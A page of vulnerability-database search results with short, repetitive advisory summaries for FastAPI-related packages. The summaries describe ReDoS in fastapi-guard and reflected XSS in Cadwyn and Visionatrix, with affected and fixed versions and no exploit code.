315 matches found
PT-2025-30607 · Unknown · Fastapi Guard
Name of the Vulnerable Software and Affected Versions: fastapi-guard versions 3.0.1 Description: The regular expression patch intended to mitigate a ReDoS vulnerability failed to adequately limit input string length. Specifically, the patch did not account for cases where the attributes within a...
PYSEC-2025-71
Cadwyn creates production-ready community-driven modern Stripe-like API versioning in FastAPI. In versions before 5.4.3, the version parameter of the "/docs" endpoint is vulnerable to a Reflected XSS Cross-Site Scripting attack. This XSS would notably allow an attacker to execute JavaScript code ...
CVE-2025-53528
Cadwyn creates production-ready community-driven modern Stripe-like API versioning in FastAPI. In versions before 5.4.3, the version parameter of the "/docs" endpoint is vulnerable to a Reflected XSS Cross-Site Scripting attack. This XSS would notably allow an attacker to execute JavaScript code ...
CVE-2025-53528
Cadwyn (FastAPI-based API versioning tool) is affected by CVE-2025-53528 due to a Reflected XSS vulnerability in the version parameter of the /docs endpoint. The issue allows an attacker to execute JavaScript in a user’s session via a crafted link. The vulnerability is fixed in version 5.4.3; rem...
CVE-2025-53528 Cadwyn is vulnerable to an XSS attack through its docs page
Cadwyn creates production-ready community-driven modern Stripe-like API versioning in FastAPI. In versions before 5.4.3, the version parameter of the "/docs" endpoint is vulnerable to a Reflected XSS Cross-Site Scripting attack. This XSS would notably allow an attacker to execute JavaScript code ...
CVE-2025-53539
FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. fastapi-guard's penetration attempts detection uses regex to scan incoming requests. However, some of the regex patterns used in detection are extremely...
The vulnerability of the fastapi-guard tool for analyzing network traffic, network detection, and response lies in its use of a regular expression with inefficient computational complexity, allowing attackers to trigger service failures.
The vulnerability of the fastapi-guard tool for analyzing network traffic, detecting network issues, and responding to them is related to the use of a regular expression with inefficient computational complexity. Exploiting this vulnerability could allow an attacker operating remotely to cause...
Regular Expression Denial Of Service (ReDoS)
fastapi-guard is vulnerable to Regular Expression Denial Of Service ReDoS. The vulnerability is due to inefficient regex pattern matching due to use of poorly optimized regular expressions that cause polynomial-time backtracking on crafted inputs, leading to high CPU usage and service...
GHSA-J47Q-RC62-W448 fastapi-guard is vulnerable to ReDoS through inefficient regex
Summary fastapi-guard detects penetration attempts by using regex patterns to scan incoming requests. However, some of the regex patterns used in detection are extremely inefficient and can cause polynomial complexity backtracks when handling specially crafted inputs. It is not as severe as...
fastapi-guard is vulnerable to ReDoS through inefficient regex
Summary fastapi-guard detects penetration attempts by using regex patterns to scan incoming requests. However, some of the regex patterns used in detection are extremely inefficient and can cause polynomial complexity backtracks when handling specially crafted inputs. It is not as severe as...
CVE-2025-53539
FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. fastapi-guard's penetration attempts detection uses regex to scan incoming requests. However, some of the regex patterns used in detection are extremely...
Regular Expression Denial of Service (ReDoS)
Overview fastapi-guard is a Security library for FastAPI to control IPs and more. Affected versions of this package are vulnerable to Regular Expression Denial of Service ReDoS via the SusPatternsManager class in the suspatternshandler.py file. An attacker can cause excessive resource consumption...
CVE-2025-53539 ReDoS in fastapi-guard's penetration attempts detector
FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. fastapi-guard's penetration attempts detection uses regex to scan incoming requests. However, some of the regex patterns used in detection are extremely...
CVE-2025-53539
CVE-2025-53539 affects fastapi-guard: the DoS risk stems from inefficient regular expressions in the SusPatternsManager (suspatterns_handler.py) used to detect penetration attempts, enabling polynomial backtracking under crafted inputs. The vulnerability is documented as fixed in version 3.0.1; r...
CVE-2025-53539 ReDoS in fastapi-guard's penetration attempts detector
FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. fastapi-guard's penetration attempts detection uses regex to scan incoming requests. However, some of the regex patterns used in detection are extremely...
CVE-2025-53539 ReDoS in fastapi-guard's penetration attempts detector
FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. fastapi-guard's penetration attempts detection uses regex to scan incoming requests. However, some of the regex patterns used in detection are extremely...
fastapi-guard 安全漏洞
fastapi-guard is a security library for FastAPI by Renzo F Individual Developer that provides middleware to control IPs, log requests and detect penetration attempts. A security vulnerability exists in fastapi-guard versions prior to 3.0.1, which stems from a regular expression pattern inefficien...
PT-2025-28250
Name of the Vulnerable Software and Affected Versions: FastAPI Guard versions prior to 3.0.1 Description: The issue concerns the penetration attempts detection mechanism in FastAPI Guard, which utilizes regex patterns to scan incoming requests. However, some of these regex patterns are inefficien...
CVE-2025-49126
Visionatrix is an AI Media processing tool using ComfyUI. In versions 1.5.0 to before 2.5.1, the /docs/flows endpoint is vulnerable to a Reflected XSS Cross-Site Scripting attack allowing full takeover of the application and exfiltration of secrets stored in the application. The implementation us...
CVE-2025-49126 Visionatrix Vulnerable to Reflected XSS Leading to Exfiltration of Secrets
Visionatrix is an AI Media processing tool using ComfyUI. In versions 1.5.0 to before 2.5.1, the /docs/flows endpoint is vulnerable to a Reflected XSS Cross-Site Scripting attack allowing full takeover of the application and exfiltration of secrets stored in the application. The implementation us...